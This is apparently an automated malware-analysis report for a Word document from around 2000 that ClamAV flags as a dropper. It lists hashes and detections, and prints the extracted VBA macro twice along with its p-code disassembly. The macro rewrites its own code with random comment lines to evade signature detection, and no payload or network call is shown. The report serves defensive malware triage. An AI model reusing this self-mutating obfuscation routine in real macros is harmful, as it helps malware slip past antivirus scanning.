Office (OLE) malware analysis — malicious · b7a9121773275d00

MALICIOUS

Office (OLE)

27.0 KB Created: 2000-04-08 00:41:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: e44cdc1d0309de93bec0a5fbfc2b9207 SHA-1: e2d8ce8846477cbe8cd6ca42406118f0c92f0dd8 SHA-256: b7a9121773275d003cd40c486a1d45382cc3dbfec130245ea5ce8749376e80cc

80 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The sample is identified as malicious by ClamAV and contains VBA macros. The macro code includes functionality to remove comment lines and insert random strings, suggesting an attempt at obfuscation or anti-analysis. While no direct payload or network communication is evident from the provided script, this self-modifying behavior is characteristic of droppers or loaders.

Heuristics 2

ClamAV: Doc.Dropper.Agent-1500979 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-1500979
VBA macros detected medium OLE_VBA_MACROS

Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3346 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3346 bytes
SHA-256: `caf641eddea2a068eb49dac2fc8b62a69fe3732f8483feff1868ee0757ba831a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Modul 1" Private Sub RndmJnkr() For V1 = 1 To ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines V2 = Mid(ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(V1, 1), 1, 1) If V2 = "'" Then ThisDocument.VBProject.VBComponents.Item(1).CodeModule.DeleteLines V1, 1 Next V1 For V3 = 1 To Int(Rnd() * 49 + 1) V4 = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines V5 = Int(Rnd() * V4 + 1) V6 = Int(Rnd() * 99 + 1) For V7 = 1 To V6 V8 = V8 + Chr$(Int((90 - 65 + 1) * Rnd + 65)) Next V7 ThisDocument.VBProject.VBComponents.Item(1).CodeModule.InsertLines V5, "'" & V8 V8 = "" Next V3 End Sub ' Processing file: /opt/analyzer/scan_staging/0e35ce38c755483f973442b45ca06092.bin ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 903 bytes ' Macros/VBA/Modul 1 - 1740 bytes ' Line #0: ' FuncDefn (Private Sub RndmJnkr()) ' Line #1: ' StartForVariable ' Ld V1 ' EndForVariable ' LitDI2 0x0001 ' LitDI2 0x0001 ' Ld ThisDocument ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' MemLd CodeModule ' MemLd CountOfLines ' For ' Line #2: ' Ld V1 ' LitDI2 0x0001 ' LitDI2 0x0001 ' Ld ThisDocument ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' MemLd CodeModule ' ArgsMemLd Lines 0x0002 ' LitDI2 0x0001 ' LitDI2 0x0001 ' ArgsLd Mid$ 0x0003 ' St V2 ' Line #3: ' Ld V2 ' LitStr 0x0001 "'" ' Eq ' If ' BoSImplicit ' Ld V1 ' LitDI2 0x0001 ' LitDI2 0x0001 ' Ld ThisDocument ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' MemLd CodeModule ' ArgsMemCall DeleteLines 0x0002 ' EndIf ' Line #4: ' StartForVariable ' Ld V1 ' EndForVariable ' NextVar ' Line #5: ' StartForVariable ' Ld V3 ' EndForVariable ' LitDI2 0x0001 ' ArgsLd Rnd 0x0000 ' LitDI2 0x0031 ' Mul ' LitDI2 0x0001 ' Add ' FnInt ' For ' Line #6: ' LitDI2 0x0001 ' Ld ThisDocument ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' MemLd CodeModule ' MemLd CountOfLines ' St V4 ' Line #7: ' ArgsLd Rnd 0x0000 ' Ld V4 ' Mul ' LitDI2 0x0001 ' Add ' FnInt ' St V5 ' Line #8: ' ArgsLd Rnd 0x0000 ' LitDI2 0x0063 ' Mul ' LitDI2 0x0001 ' Add ' FnInt ' St V6 ' Line #9: ' StartForVariable ' Ld V7 ' EndForVariable ' LitDI2 0x0001 ' Ld V6 ' For ' Line #10: ' Ld V8 ' LitDI2 0x005A ' LitDI2 0x0041 ' Sub ' LitDI2 0x0001 ' Add ' Paren ' Ld Rnd ' Mul ' LitDI2 0x0041 ' Add ' FnInt ' ArgsLd Chr$ 0x0001 ' Add ' St V8 ' Line #11: ' StartForVariable ' Ld V7 ' EndForVariable ' NextVar ' Line #12: ' Ld V5 ' LitStr 0x0001 "'" ' Ld V8 ' Concat ' LitDI2 0x0001 ' Ld ThisDocument ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' MemLd CodeModule ' ArgsMemCall InsertLines 0x0002 ' Line #13: ' LitStr 0x0000 "" ' St V8 ' Line #14: ' StartForVariable ' Ld V3 ' EndForVariable ' NextVar ' Line #15: ' EndSub

SHA-256: caf641eddea2a068eb49dac2fc8b62a69fe3732f8483feff1868ee0757ba831a

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Modul 1"
Private Sub RndmJnkr()
For V1 = 1 To ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
V2 = Mid(ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(V1, 1), 1, 1)
If V2 = "'" Then ThisDocument.VBProject.VBComponents.Item(1).CodeModule.DeleteLines V1, 1
Next V1
For V3 = 1 To Int(Rnd() * 49 + 1)
V4 = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
V5 = Int(Rnd() * V4 + 1)
V6 = Int(Rnd() * 99 + 1)
For V7 = 1 To V6
V8 = V8 + Chr$(Int((90 - 65 + 1) * Rnd + 65))
Next V7
ThisDocument.VBProject.VBComponents.Item(1).CodeModule.InsertLines V5, "'" & V8
V8 = ""
Next V3
End Sub

' Processing file: /opt/analyzer/scan_staging/0e35ce38c755483f973442b45ca06092.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 903 bytes
' Macros/VBA/Modul 1 - 1740 bytes
' Line #0:
' 	FuncDefn (Private Sub RndmJnkr())
' Line #1:
' 	StartForVariable 
' 	Ld V1 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld ThisDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	For 
' Line #2:
' 	Ld V1 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld ThisDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	ArgsLd Mid$ 0x0003 
' 	St V2 
' Line #3:
' 	Ld V2 
' 	LitStr 0x0001 "'"
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	Ld V1 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld ThisDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall DeleteLines 0x0002 
' 	EndIf 
' Line #4:
' 	StartForVariable 
' 	Ld V1 
' 	EndForVariable 
' 	NextVar 
' Line #5:
' 	StartForVariable 
' 	Ld V3 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	ArgsLd Rnd 0x0000 
' 	LitDI2 0x0031 
' 	Mul 
' 	LitDI2 0x0001 
' 	Add 
' 	FnInt 
' 	For 
' Line #6:
' 	LitDI2 0x0001 
' 	Ld ThisDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	St V4 
' Line #7:
' 	ArgsLd Rnd 0x0000 
' 	Ld V4 
' 	Mul 
' 	LitDI2 0x0001 
' 	Add 
' 	FnInt 
' 	St V5 
' Line #8:
' 	ArgsLd Rnd 0x0000 
' 	LitDI2 0x0063 
' 	Mul 
' 	LitDI2 0x0001 
' 	Add 
' 	FnInt 
' 	St V6 
' Line #9:
' 	StartForVariable 
' 	Ld V7 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld V6 
' 	For 
' Line #10:
' 	Ld V8 
' 	LitDI2 0x005A 
' 	LitDI2 0x0041 
' 	Sub 
' 	LitDI2 0x0001 
' 	Add 
' 	Paren 
' 	Ld Rnd 
' 	Mul 
' 	LitDI2 0x0041 
' 	Add 
' 	FnInt 
' 	ArgsLd Chr$ 0x0001 
' 	Add 
' 	St V8 
' Line #11:
' 	StartForVariable 
' 	Ld V7 
' 	EndForVariable 
' 	NextVar 
' Line #12:
' 	Ld V5 
' 	LitStr 0x0001 "'"
' 	Ld V8 
' 	Concat 
' 	LitDI2 0x0001 
' 	Ld ThisDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall InsertLines 0x0002 
' Line #13:
' 	LitStr 0x0000 ""
' 	St V8 
' Line #14:
' 	StartForVariable 
' 	Ld V3 
' 	EndForVariable 
' 	NextVar 
' Line #15:
' 	EndSub

Open this report in the interactive analyzer, or submit your own file for analysis.